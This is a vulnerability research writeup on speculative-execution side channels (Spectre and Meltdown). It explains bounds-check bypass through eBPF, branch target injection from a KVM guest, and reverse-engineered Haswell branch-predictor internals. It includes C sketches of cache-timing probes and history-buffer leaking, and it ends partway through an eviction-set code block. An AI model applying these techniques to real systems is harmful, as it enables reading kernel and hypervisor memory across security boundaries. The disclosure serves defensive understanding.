We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

So far, there are three known variants of the issue:

Variant 1: bounds check bypass (CVE-2017-5753)
Variant 2: branch target injection (CVE-2017-5715)
Variant 3: rogue data cache load (CVE-2017-5754)

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

Spectre (variants 1 and 2)
Meltdown (variant 3)

During the course of our research, we developed the following proofs of concept (PoCs):

A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian's distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn't been tested.)
A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

For interesting resources around this topic, look down into the "Literature" section.

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

The PoC code and the writeups that we sent to the CPU vendors will be made available at a later date.
Tested Processors
Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" in the rest of this document)
AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" in the rest of this document)
AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" in the rest of this document)
An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called "ARM Cortex A57" in the rest of this document)
Glossary
retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

cached/uncached data: In this blogpost, "uncached" data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.
Variant 1: Bounds check bypass
This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

Intel Haswell Xeon CPU, eBPF JIT is off (default state)
Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
AMD PRO CPU, eBPF JIT is on (non-default state)

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.
Theoretical explanation
The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 ("Branch Prediction"):

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

In section 2.3.5.2 ("L1 DCache"):

Loads can:
[...]
Be carried out speculatively, before preceding branches are resolved.
Take cache misses out of order and in an overlapped manner.

Intel's Software Developer's Manual [7] states in Volume 3A, section 11.7 ("Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors)"):

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

struct array {
  unsigned long length;
  unsigned char data[];
};
struct array *arr1 = ...;
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
  unsigned char value = arr1->data[untrusted_offset_from_caller];
  ...
}
However, in the following code sample, there's an issue. If arr1->length, arr2->data[0x200] and arr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

load value = arr1->data[untrusted_offset_from_caller]
start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

struct array {
  unsigned long length;
  unsigned char data[];
};
struct array *arr1 = ...; /* small array */
struct array *arr2 = ...; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
  unsigned char value = arr1->data[untrusted_offset_from_caller];
  unsigned long index2 = ((value&1)*0x100)+0x200;
  if (index2 < arr2->length) {
    unsigned char value2 = arr2->data[index2];
  }
}

After the execution has been returned to the non-speculative path because the processor has noticed that untrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] and arr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 - which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.
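The timing measurement behind this probe can be sketched with x86 intrinsics (gcc/clang on x86-64 assumed); the threshold value is machine-dependent and would need to be calibrated in practice:

```c
#include <stdint.h>
#include <x86intrin.h>

/* Time a single load of *p in cycles (x86-64, gcc/clang). __rdtscp
 * is partially serializing, so the load is bracketed by the reads. */
static uint64_t time_load(const volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p; /* the load being timed */
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

/* Classify an address as cached if the load completes below a
 * machine-dependent threshold (on the order of ~150 cycles; a real
 * attack would calibrate this per machine). */
int probe_cached(volatile uint8_t *p, uint64_t threshold) {
    return time_load(p) < threshold;
}
```

An attacker would `_mm_clflush` the two probe lines, trigger the speculative access, and then compare `time_load` on `arr2->data[0x200]` against `arr2->data[0x300]` to recover the leaked bit.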

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.
Attacking the kernel
This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

either interpreted by an in-kernel bytecode interpreter
or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

Whether the JIT engine is enabled depends on a run-time configuration setting - but at least on the tested Intel processor, the attack works independent of that setting.

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

eBPF's data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn't be a precondition in principle).

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array's length to be slow on other physical CPU cores (intentional false sharing).

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling through prog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 2^15 adjacent userspace memory mappings [9], each consisting of 2^4 pages, are created at the userspace address user_mapping_area, covering a total area of 2^31 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

This permits the attack to be carried out in steps of 2^31 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 2^4 pages of user_mapping_area has to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.
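As a quick check of the arithmetic (assuming 4 KiB pages), 2^15 mappings of 2^4 pages each cover exactly 2^31 bytes:

```c
#include <stdint.h>

enum {
    PAGE_SIZE     = 4096,    /* 2^12 bytes, assumed */
    PAGES_PER_MAP = 1 << 4,  /* pages per mapping */
    NUM_MAPPINGS  = 1 << 15, /* adjacent mappings */
};

/* Total span of user_mapping_area covered in one guessing step */
uint64_t mapping_area_size(void) {
    return (uint64_t)NUM_MAPPINGS * PAGES_PER_MAP * PAGE_SIZE;
}
```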

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). Only the middle bits of the address of user_mapping_area remain to be determined.

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.
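The bisection can be sketched with a mock oracle standing in for the cache probe; in the real attack, a "hit" means the candidate range's physical page turned up in the cache, whereas here a hidden value simply drives the oracle:

```c
#include <stdint.h>

/* The hidden middle bits; in the real attack this is what the cache
 * side channel reveals, here it just drives the mock oracle. */
static uint32_t secret_middle;

/* Mock oracle: "did mapping the candidate range with this bit value
 * produce a cache hit?" */
static int oracle_hit(int bit_index, int guessed_one) {
    return (int)((secret_middle >> bit_index) & 1) == guessed_one;
}

/* Recover nbits unknown bits one at a time: each round maps two
 * candidate ranges (bit = 0 vs bit = 1) covering half of the
 * remaining search space each, and keeps whichever the oracle
 * confirms - halving the search space per round. */
uint32_t bisect_middle_bits(int nbits) {
    uint32_t recovered = 0;
    for (int i = nbits - 1; i >= 0; i--)
        if (oracle_hit(i, 1))
            recovered |= 1u << i;
    return recovered;
}
```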

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_map, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

This program reads 8-byte-aligned 64-bit values from an eBPF data array "victim_map" at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 2^7 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_map that causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.
Variant 2: Branch target injection
This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian's distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.
Basics
Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other's branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won't know the true destination of the jump, and it won't be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.
Haswell branch prediction internals
Some of the internals of the branch prediction implemented by Intel's processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

Haswell seems to have multiple branch prediction mechanisms that work very differently:

A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
(There is also a specialized return predictor, according to Intel's optimization manual, but we haven't analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)
Generic predictor
The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn't store the full, absolute destination address.

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

bit A        bit B
0x40.0000    0x2000
0x80.0000    0x4000
0x100.0000   0x8000
0x200.0000   0x1.0000
0x400.0000   0x2.0000
0x800.0000   0x4.0000
0x2000.0000  0x10.0000
0x4000.0000  0x20.0000

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can't distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn't been verified.
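A toy model of this folding (an assumption consistent with the observed aliasing, not a verified description of the hardware) can reproduce the examples above:

```c
#include <assert.h>
#include <stdint.h>

/* Toy model of the folding: for each row (A, B) of the table above,
 * bit A is XORed into bit B and then discarded, so two addresses that
 * differ in exactly the two bits of one row map to the same index.
 * (The real lookup may fold differently; this only reproduces the
 * observed aliasing behavior.) */
static const uint32_t fold_pairs[8][2] = {
    {0x400000,   0x2000},   {0x800000,   0x4000},
    {0x1000000,  0x8000},   {0x2000000,  0x10000},
    {0x4000000,  0x20000},  {0x8000000,  0x40000},
    {0x20000000, 0x100000}, {0x40000000, 0x200000},
};

uint32_t btb_index(uint64_t src_last_byte) {
    uint32_t key = (uint32_t)(src_last_byte & 0x7fffffff); /* lower 31 bits */
    for (int i = 0; i < 8; i++) {
        if (key & fold_pairs[i][0])
            key ^= fold_pairs[i][1]; /* fold bit A into bit B */
        key &= ~fold_pairs[i][0];    /* drop bit A after folding */
    }
    return key;
}
```

Under this model, 0x100.0000 and 0x140.2000 map to the same index, while 0x100.0000 and 0x180.0000 remain distinguishable, matching the examples in the text.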

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 2^32 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.
Indirect call predictor
The inputs of the BTB lookup for this mechanism seem to be:

The low 12 bits of the address of the source instruction (we are not sure whether it's the address of the first or the last byte) or a subset of them.
The branch history buffer state.

If the indirect call predictor can't resolve a branch, it is resolved by the generic predictor instead. Intel's optimization manual hints at this behavior: "Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior."

The branch history buffer (BHB) stores information about the last 29 taken branches - basically a fingerprint of recent control flow - and is used to allow better prediction of indirect calls that can have multiple targets.

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
  *bhb_state <<= 2;
  *bhb_state ^= (dst & 0x3f);
  *bhb_state ^= (src & 0xc0) >> 6;
  *bhb_state ^= (src & 0xc00) >> (10 - 2);
  *bhb_state ^= (src & 0xc000) >> (14 - 4);
  *bhb_state ^= (src & 0x30) << (6 - 4);
  *bhb_state ^= (src & 0x300) << (8 - 8);
  *bhb_state ^= (src & 0x3000) >> (12 - 10);
  *bhb_state ^= (src & 0x30000) >> (16 - 12);
  *bhb_state ^= (src & 0xc0000) >> (18 - 14);
}
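As a sanity check of the 58-bit width and the 2-bits-per-branch shift, the update function can be simulated: any difference between two initial states should be shifted out after at most 29 identical taken branches (58/2 = 29). The 58-bit state is modeled here in a masked uint64_t; the width itself is an inference, not a direct observation.

```c
#include <assert.h>
#include <stdint.h>

#define BHB_MASK (((uint64_t)1 << 58) - 1)

/* The update function from above, with the 58-bit state modeled as a
 * masked uint64_t. */
static void bhb_update58(uint64_t *bhb_state, uint64_t src, uint64_t dst) {
    *bhb_state <<= 2;
    *bhb_state ^= (dst & 0x3f);
    *bhb_state ^= (src & 0xc0) >> 6;
    *bhb_state ^= (src & 0xc00) >> (10 - 2);
    *bhb_state ^= (src & 0xc000) >> (14 - 4);
    *bhb_state ^= (src & 0x30) << (6 - 4);
    *bhb_state ^= (src & 0x300) << (8 - 8);
    *bhb_state ^= (src & 0x3000) >> (12 - 10);
    *bhb_state ^= (src & 0x30000) >> (16 - 12);
    *bhb_state ^= (src & 0xc0000) >> (18 - 14);
    *bhb_state &= BHB_MASK;
}

/* Count identical taken branches until two initial states collide. */
static int branches_until_equal(uint64_t a, uint64_t b) {
    int n = 0;
    while (a != b) {
        bhb_update58(&a, 0x1000, 0x2000);
        bhb_update58(&b, 0x1000, 0x2000);
        n++;
    }
    return n;
}
```

A difference in bit 0 survives for exactly 29 updates; a difference in the top two bits is erased after a single update. This is consistent with the experimentally observed history depth.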

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn't been understood yet.

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code - for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).
Reverse-Engineering Branch Predictor Internals
This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn't keep a detailed record of what we were doing.

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked - however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to "recent program behavior" in Intel's optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don't influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn't influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn't store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

However, a history buffer needs to "forget" about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards - and given that, upwards combination of information probably wouldn't be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.
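These non-disambiguating bit-flip pairs match the bhb_update() pseudocode above: target bit 0x1 and source bit 0x40 both land on bit 0 of the per-branch value, and target bit 0x2 and source bit 0x80 both land on bit 1, so flipping one of each pair cancels out. This can be checked directly on the per-branch mix value:

```c
#include <assert.h>
#include <stdint.h>

/* The value XORed into the history buffer for one taken branch,
 * extracted from the bhb_update() pseudocode above. */
uint64_t bhb_mix(uint64_t src, uint64_t dst) {
    uint64_t v = 0;
    v ^= (dst & 0x3f);
    v ^= (src & 0xc0) >> 6;
    v ^= (src & 0xc00) >> (10 - 2);
    v ^= (src & 0xc000) >> (14 - 4);
    v ^= (src & 0x30) << (6 - 4);
    v ^= (src & 0x300) << (8 - 8);
    v ^= (src & 0x3000) >> (12 - 10);
    v ^= (src & 0x30000) >> (16 - 12);
    v ^= (src & 0xc0000) >> (18 - 14);
    return v;
}
```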
Reading host memory from a KVM guest
Locating the host kernel
Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

lower 20 bits of the address of kvm-intel.ko
full address of kvm.ko
full address of vmlinux

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section "Reverse-Engineering Branch Predictor Internals", using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) - by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.
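The reconstruction loop can be sketched as follows, with the misprediction measurement replaced by a simulated oracle (in the real attack, mispredicts() is the timing measurement described above, and the true history value is of course unknown):

```c
#include <assert.h>
#include <stdint.h>

#define BHB_MASK (((uint64_t)1 << 58) - 1)

/* Simulated hypervisor-side history buffer value. */
static const uint64_t true_bhb = 0x123456789abcdefULL;

/* Oracle model: after n zero-contribution branches following the
 * hypercall, the hypervisor's BHB has been shifted left by 2*n bits;
 * mispredictions occur when the attacker-controlled value matches it. */
static int mispredicts(uint64_t guess, int n) {
    return guess == ((true_bhb << (2 * n)) & BHB_MASK);
}

/* Reconstruct the history buffer 2 bits at a time, as described in the
 * text: start at N=28 with candidates {0,1,2,3}<<(28*2), then for each
 * smaller N shift the previous result right by 2 and try the four
 * possible top candidates. */
uint64_t leak_bhb(void) {
    uint64_t history = 0; /* value for N=29: everything shifted out */
    for (int n = 28; n >= 0; n--) {
        for (uint64_t c = 0; c < 4; c++) {
            uint64_t guess = (c << (28 * 2)) | (history >> 2);
            if (mispredicts(guess, n)) { history = guess; break; }
        }
    }
    return history;
}
```

In the simulation, the loop recovers the full history buffer value exactly; in practice the oracle is noisy, so each step has to be repeated and thresholded.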

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to 0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section "Generic Predictor" apply; there will be 2^4-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/2^4=1024.

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 2^20) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 2^16 remaining possibilities for the load address of kvm.ko.

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won't actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.
Identifying cache sets
The PoC assumes that the VM does not have access to hugepages. To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they're probably not part of an eviction set), and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].
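The reduction step can be sketched with a toy model, assuming an idealized set-associative L3 in which a candidate group evicts a victim line iff it contains at least WAYS lines mapping to the victim's cache set (in the real PoC, evicts() is a cache-timing measurement, and the set mapping is unknown):

```c
#include <assert.h>
#include <string.h>

#define WAYS   12
#define SETS   64
#define NPAGES 1024

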